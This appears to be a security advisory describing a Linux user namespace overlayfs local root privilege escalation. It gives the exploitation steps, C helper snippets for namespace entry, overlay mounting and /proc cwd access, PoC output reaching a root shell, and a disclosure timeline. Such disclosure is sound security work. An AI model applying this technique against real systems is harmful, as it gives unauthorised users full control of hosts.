Linux User Namespace Overlayfs Local Root Privilege Escalation

Problem description:

Linux user namespaces allow a normal user to mount file systems, including overlayfs. As many of those features were not designed with namespaces in mind, this increases the attack surface of the Linux kernel interface. Due to missing security checks when changing the mode of files on overlayfs, a SUID binary can be created within a user namespace but executed from outside it to gain root privileges.

Overlayfs was intended to provide a writable filesystem when running from read-only media, e.g. a live CD. In such a scenario, the lower filesystem contains the read-only data from the medium, and the upper filesystem is layered on top of it. The merged view is then presented as an overlayfs at a given mount point. Writes to this overlayfs only modify the data in the upper filesystem, which may reside on a tmpfs for that purpose.
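The lower/upper layout described above maps directly onto the mount options of overlayfs. The following is a minimal sketch, not code from the original PoC: the function names build_overlay_opts and mount_overlay are hypothetical, and the filesystem type name "overlay" is an assumption (mainline kernels since 3.18 use it; some older distribution kernels registered "overlayfs" instead).

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/mount.h>

/* Build the overlayfs option string, e.g.
 * "lowerdir=/bin,upperdir=/tmp/ovl/upper,workdir=/tmp/ovl/work".
 * Returns 0 on success, -1 if the buffer is too small. */
int build_overlay_opts(char *buf, size_t len, const char *lower,
                       const char *upper, const char *work)
{
    int n = snprintf(buf, len, "lowerdir=%s,upperdir=%s,workdir=%s",
                     lower, upper, work);
    return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

/* Mount the merged view at `target`.
 * The caller needs CAP_SYS_ADMIN in the user namespace that owns the
 * current mount namespace. Returns 0 on success, -1 with errno set.
 * Assumption: the filesystem type is registered as "overlay". */
int mount_overlay(const char *target, const char *lower,
                  const char *upper, const char *work)
{
    char opts[4096];

    if (build_overlay_opts(opts, sizeof(opts), lower, upper, work) != 0)
        return -1;
    return mount("overlay", target, "overlay", 0, opts);
}
```

A call such as mount_overlay("/tmp/ovl/merged", "/bin", "/tmp/ovl/upper", "/tmp/ovl/work") would present /bin at /tmp/ovl/merged, with all modifications landing in the upper directory. The directory names here are illustrative only.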

One problematic use case is the modification of files, or of file attributes, on an overlayfs within a user namespace. A user without any capabilities on the host is given CAP_SYS_ADMIN within the user namespace and thus has the capability to change the attributes of files on the overlayfs, unless the kernel also checks whether the host-system user would be allowed to change those attributes without holding CAP_SYS_ADMIN on the host. As this check was missing, a process within the namespace could gain read/write access to arbitrary files. Combined with the SUID-write technique from a previous article (SetgidDirectoryPrivilegeEscalation), modifying SUID binaries owned by host UID 0 allows escalation to the host root user.

Methods

Exploitation Technique:

Exploitation is technically quite simple:

Create a new user and mount namespace using clone with the CLONE_NEWUSER|CLONE_NEWNS flags.
Mount an overlayfs using /bin as the lower filesystem and some temporary directories as the upper and work directories.
The overlayfs mount would only be visible within the user namespace, so let the namespace process change its CWD to the overlayfs, which also makes the overlayfs reachable from outside the namespace via the proc filesystem.
Make su on the overlayfs world-writable without changing the owner.
Let a process outside the user namespace write arbitrary content to the file by applying a slightly modified variant of the SetgidDirectoryPrivilegeEscalation exploit.
Execute the modified su binary.
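The first step of the list above, entering a new user and mount namespace and mapping the caller to UID/GID 0 inside it, can be sketched as follows. This is an illustration under stated assumptions, not the original PoC: it uses unshare(2) on the calling process instead of clone(2), it writes the maps through /proc/self whereas the PoC output shows the parent writing /proc/PID/uid_map for the child, and the helper names format_id_map, write_proc_file and enter_user_mount_ns are hypothetical.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Format a single-entry ID map line: "<inside> <outside> 1\n". */
int format_id_map(char *buf, size_t len, unsigned inside, unsigned outside)
{
    int n = snprintf(buf, len, "%u %u 1\n", inside, outside);
    return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

/* Write a whole string to an existing file in one write(2) call. */
int write_proc_file(const char *path, const char *text)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, text, strlen(text));
    close(fd);
    return (n == (ssize_t)strlen(text)) ? 0 : -1;
}

/* Enter a new user + mount namespace and map the caller to UID/GID 0
 * inside it. Returns 0 on success, -1 on failure (for example when
 * unprivileged user namespaces are disabled on the system). */
int enter_user_mount_ns(void)
{
    char map[64];
    uid_t uid = getuid();   /* host IDs, read before unshare() */
    gid_t gid = getgid();

    if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)
        return -1;

    /* Newer kernels require "deny" in setgroups before an unprivileged
     * gid_map write; the file is absent on older kernels, so a failure
     * here is deliberately ignored. */
    (void)write_proc_file("/proc/self/setgroups", "deny");

    if (format_id_map(map, sizeof(map), 0, (unsigned)uid) != 0 ||
        write_proc_file("/proc/self/uid_map", map) != 0)
        return -1;
    if (format_id_map(map, sizeof(map), 0, (unsigned)gid) != 0 ||
        write_proc_file("/proc/self/gid_map", map) != 0)
        return -1;
    return 0;
}
```

After enter_user_mount_ns() returns 0, geteuid() reports 0 inside the namespace and the process holds a full capability set there, which is what permits the overlayfs mount in the second step.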

POC:

This exploit uses one parent process and one user namespace process. The namespace process creates the overlayfs mount, changes its working directory to it and makes su writable. Afterwards it waits until the parent has gained root privileges before rolling everything back: unmounting and cleaning up helper files. As soon as the parent process notices that the child has prepared su as intended, it uses the technique from SetgidDirectoryPrivilegeEscalation, that is, calling another SUID binary, e.g. mount, and using its stderr to write to the opened su file without losing the SUID bit. Afterwards the parent process invokes the modified su to create a UID 0 process. The change of the parent's UID then triggers the namespace child to start cleanup. See UserNamespaceOverlayfsSetuidWriteExec.c for example code.

build# ./UserNamespaceOverlayfsSetuidWriteExec -- /bin/bash
Setting uid map in /proc/491/uid_map
Setting gid map in /proc/491/gid_map
euid: 0, egid: 0
euid: 0, egid: 0
Namespace helper waiting for modification completion
Namespace part completed
root#

Results, Discussion

The missing security checks in overlayfs were simply a mistake that should not have happened, but one which by itself would not have had such devastating effects. Exposing a considerable amount of kernel functionality to unprivileged users via user namespaces increases the attack surface of the kernel significantly. Thus it might be a good idea to disable unprivileged user namespaces on standard kernels by default and grant them only to selected users.

For the above exploit to work, exposure within the namespace alone is not sufficient: a process outside the namespace uses /proc to access mounts that should be visible only to processes within the namespace. This is already a risk and might also be a security vulnerability in its own right, worth fixing. Mixing content from within namespaces with processes outside the namespace was also used for FIXME.
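The /proc access path mentioned above relies on /proc/PID/cwd, a magic link that resolves to the working directory of the target process even when that directory lies on a mount in another mount namespace. A minimal sketch of how an outside process might build and open such a path follows; the helper names proc_cwd_path and open_via_proc_cwd are hypothetical, and whether the open succeeds depends on the usual /proc access checks for the target process.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>

/* Build "/proc/<pid>/cwd/<name>", the path under which a file in the
 * working directory of process `pid` is reachable from outside.
 * Returns 0 on success, -1 if the buffer is too small. */
int proc_cwd_path(char *buf, size_t len, pid_t pid, const char *name)
{
    int n = snprintf(buf, len, "/proc/%ld/cwd/%s", (long)pid, name);
    return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

/* Open a file relative to another process's working directory.
 * Returns a file descriptor, or -1 on error. */
int open_via_proc_cwd(pid_t pid, const char *name, int flags)
{
    char path[4096];

    if (proc_cwd_path(path, sizeof(path), pid, name) != 0)
        return -1;
    return open(path, flags);
}
```

With the PID from the PoC output, proc_cwd_path(buf, sizeof(buf), 491, "su") yields /proc/491/cwd/su, which names the su file on the overlayfs once the namespace process has changed its working directory there.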

Timeline

20151206: First LKML activity (no hint on security effects) https://lkml.org/lkml/2015/12/6/137
20151224: Discovery, report at Ubuntu
20151224: Read about probably similar vulnerability on oss-security
20151224: Confirmation from Ubuntu that the fix for CVE-2015-8660 also mitigates the vulnerability from this report
20151224: Tests on new Fedora, kernel-4.2.8-300.fc23, not vulnerable
20160110: Full disclosure post
20160122: Patch to disable unprivileged userns due to this and other issues (LKML)

Introduction